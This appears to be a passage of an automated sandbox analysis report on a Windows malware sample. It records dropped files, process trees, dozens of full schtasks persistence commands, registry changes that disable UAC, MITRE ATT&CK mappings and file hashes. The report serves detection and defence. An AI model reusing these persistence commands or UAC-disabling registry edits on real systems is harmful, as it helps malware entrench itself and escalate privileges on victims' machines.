59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Program Files\Windows Media Player\it-IT\sppsvc.exe 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\RCXE43C.tmp 59b9f54f927431d2cf31d3aa202a0843.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\fontdrvhost.exe 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Windows\appcompat\Programs\RCXDC85.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Windows\appcompat\Programs\upfc.exe 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Windows\Panther\UnattendGC\fontdrvhost.exe 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Windows\appcompat\Programs\upfc.exe 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Windows\appcompat\Programs\ea1d8f6d871115 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Windows\Panther\UnattendGC\RCXD3B6.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File created C:\Windows\Panther\UnattendGC\5b884080fd4f94 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Windows\Panther\UnattendGC\RCXD3B5.tmp 59b9f54f927431d2cf31d3aa202a0843.exe File opened for modification C:\Windows\appcompat\Programs\RCXDD03.tmp 59b9f54f927431d2cf31d3aa202a0843.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings 59b9f54f927431d2cf31d3aa202a0843.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings fontdrvhost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 42 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3936 schtasks.exe 3408 schtasks.exe 3536 schtasks.exe 3820 schtasks.exe 3720 schtasks.exe 2600 schtasks.exe 4800 schtasks.exe 3060 schtasks.exe 4992 schtasks.exe 4068 schtasks.exe 2484 schtasks.exe 2000 schtasks.exe 3836 schtasks.exe 2820 schtasks.exe 3056 schtasks.exe 2340 schtasks.exe 3592 schtasks.exe 1148 schtasks.exe 1404 schtasks.exe 3200 schtasks.exe 3012 schtasks.exe 3008 schtasks.exe 2520 schtasks.exe 4260 schtasks.exe 4872 schtasks.exe 752 schtasks.exe 1964 schtasks.exe 4380 schtasks.exe 4556 schtasks.exe 396 schtasks.exe 4384 schtasks.exe 4516 schtasks.exe 2940 schtasks.exe 3636 schtasks.exe 4140 schtasks.exe 4152 schtasks.exe 1972 schtasks.exe 4160 schtasks.exe 4768 schtasks.exe 1956 schtasks.exe 1032 schtasks.exe 4136 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1176 59b9f54f927431d2cf31d3aa202a0843.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe 1328 fontdrvhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1328 fontdrvhost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1176 59b9f54f927431d2cf31d3aa202a0843.exe Token: SeDebugPrivilege 1328 fontdrvhost.exe Token: SeBackupPrivilege 5048 vssvc.exe Token: SeRestorePrivilege 5048 vssvc.exe Token: SeAuditPrivilege 5048 vssvc.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1328 fontdrvhost.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1176 wrote to memory of 1096 1176 59b9f54f927431d2cf31d3aa202a0843.exe 131 PID 1176 wrote to memory of 1096 1176 59b9f54f927431d2cf31d3aa202a0843.exe 131 PID 1096 wrote to memory of 5052 1096 cmd.exe 133 PID 1096 wrote to memory of 5052 1096 cmd.exe 133 PID 1096 wrote to memory of 1328 1096 cmd.exe 134 PID 1096 wrote to memory of 1328 1096 cmd.exe 134 PID 1328 wrote to memory of 2600 1328 fontdrvhost.exe 135 PID 1328 wrote to memory of 2600 1328 fontdrvhost.exe 135 PID 1328 wrote to memory of 4152 1328 fontdrvhost.exe 136 PID 1328 wrote to memory of 4152 1328 fontdrvhost.exe 136 -
System policy modification 1 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" fontdrvhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 59b9f54f927431d2cf31d3aa202a0843.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" 59b9f54f927431d2cf31d3aa202a0843.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\59b9f54f927431d2cf31d3aa202a0843.exe"C:\Users\Admin\AppData\Local\Temp\59b9f54f927431d2cf31d3aa202a0843.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Drops file in Drivers directory
- Checks computer location settings
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1176 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vuKmrV6lXC.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:5052
-
-
C:\Recovery\WindowsRE\fontdrvhost.exe"C:\Recovery\WindowsRE\fontdrvhost.exe"3⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1328 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56e953f9-9ea1-4007-8b8b-81948365d831.vbs"4⤵PID:2600
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1c330845-14ba-4531-95d3-034dd9828f9b.vbs"4⤵PID:4152
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\NetHood\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3636
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\NetHood\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3060
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Media Player\it-IT\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3408
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\it-IT\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Media Player\it-IT\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1148
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Users\Public\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4260
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Public\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Windows\Panther\UnattendGC\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\Panther\UnattendGC\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Windows\Panther\UnattendGC\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3200
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a08435" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3012
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a0843" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3820
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a08435" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4140
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a08435" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4800
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a0843" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4152
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a08435" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Windows\appcompat\Programs\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Windows\appcompat\Programs\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4384
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Windows\appcompat\Programs\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2820
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default User\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3056
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4160
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4768
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4068
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2484
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4136
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3592
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:3068
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD5dc5aea2370933725deb249ff35911970
SHA16d2cced25ceb383a3a735a8920db593879cc29bd
SHA256fd9d119fa3c2014012a30882e6f6ed3ac1fab9561f0a6afc46362d3acae0f295
SHA5125c3837e3cd7e5bc510d107350d760c6e5cc0ad89804e98c38d327d5e25c95fb5c702f3c19c9704813f0e7df0bc89ec0ce1db3b14aee55f520e38a723b2a8aca0
-
Filesize
2.2MB
MD58d3d97921a4f4d3bc4f2a6232419da1c
SHA1995a874fcbef603a121927dc055bce608279ae5c
SHA256c6240a4c22024c286f4444827afc625ec16e24cf485322ad2c0efaab655d7308
SHA512ec9351cc0373cee9324772010e55e3fa10f29765b62ff8078fd2106db327f33a040be8699fa2193c3c04d3a64a19ce8f06868944a51cbfd2b10702ab483d9eeb
-
Filesize
2.2MB
MD5722e45b8daf9b4c1bc116f73829dd98b
SHA1a8e35bc5958119299fcd8d080d2c6465c8748ba5
SHA256eb13cc17dea657fce65204e58d69eef69fe2eec3048d20cce57f1e88843980d7
SHA512f2a6a4c65e0e6d1179070c2a03f1683c5d71ef8ff6ebed4aa782d18d9c76e95659000f569e0d664fb9e3f5575a89c7ef6181623f65be6ba3d37b45dc1d893d57
-
Filesize
2.2MB
MD596d7491988ae6f61abaccee989d3fa98
SHA13c86f954be8f502a43f52dc83edf4fcc9fe43795
SHA256792ca0b9702209dee198a595d0e9c4835f887fd45c9a14066bd3911fcddb8197
SHA51271beee463d9d7ee87d88a9dadae54c8db76f7cb7dd7a24d2231c8c9ba427f1392e03d23184df8941a53a65150d43bc52601d46ca0ded538edef1f2bfcd148c2d
-
Filesize
2.2MB
MD554b48d7611fb49892fd9f36e6c9eb58c
SHA1ca6e1ff091ea3624afd344751886e9b4e655a6f3
SHA256f8fd70996226e10c0e26187249fc0e156c5d5141f6db19e2cf070b75d0e800c8
SHA51252312fb241f9c9a3e1978e64127e574e35130b052081ead8eeb3bc9361825738cab14d172e3651effc7b97615cfec9ca565726decb3b721c1754c4f7a84ae754
-
Filesize
489B
MD50b2db16ba197e1f81b7e64455c7b96f5
SHA18775fa0d20477e65e0720d8e036f1961f24b988e
SHA256b310775fac59c3aaed2b97460b02de782e7cbe3e9e8122f481a4732dc57a070e
SHA512a783686adb8d6c07107228669f65e41c938c244b0e5f60aafbd663e74909af93a2f3b1102262a2a84cfb2b0e549ef51cfac3b437498e9534981685b6e02655b1
-
Filesize
713B
MD58551c9baa66c62fdb4a5aa021bef1e79
SHA1c704c356705b41031592dd10ef740d12a9c6289a
SHA25664f21edf6edd71513e7c3b474613bb0d451632f14b33f822dfea59bd2ffa42f2
SHA512b87e6a104ab9f8e8274cfcbf1962a064931fe0cf791ec0fd28bdf69f3813f2adbc6b2c8e6e14d0fe9bc2cbaa1385fbd8974daa37b1389dd84c4036a8076e82d0
-
Filesize
202B
MD5c5754a838de767e9c8080fb925a5dad9
SHA127adf4b8f9db9a312e7670203cdb3c1e866c811d
SHA25680a44ba3f619ce898fc4dee5bad63e77ff183ca2a7956f4df40230df55232462
SHA512e070060eeb7d0373575074b0c5a5acd6f09b7ea916f02a1f07043ae586e1e2569582a54f26b3fccf958e1d015b2ead1a272691fb63a57d843d49d272f1a5909a
-
Filesize
2.2MB
MD5f35ce36a3fdb9da9d93b6cc2c5c49964
SHA1ef1c01a531cf3a2c7e407f34eed4dc1210cb7689
SHA25619ced0237a73c7073ce91aa9242b189b48111d93c8fbe5df70f8f724f0b70875
SHA5129c0b295d309e146295b8c52ffd84c59e32847d669c55a4c6df6e823b5b574e6760b33fc9000dc0f386aac0886add99221c7d46043e7c7107bf4eb1ef302880fa
-
Filesize
2.2MB
MD559b9f54f927431d2cf31d3aa202a0843
SHA1b23d214605133dc8e930f9a9d473c7c7622b4b56
SHA256007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594
SHA51289106822646d8d412d5c956fd01ad37e4b1f34599497f8e362262f82d2d47f4460632019d6ec09da58c45d690ebd03f2812d5809743203be081702680bfb28f8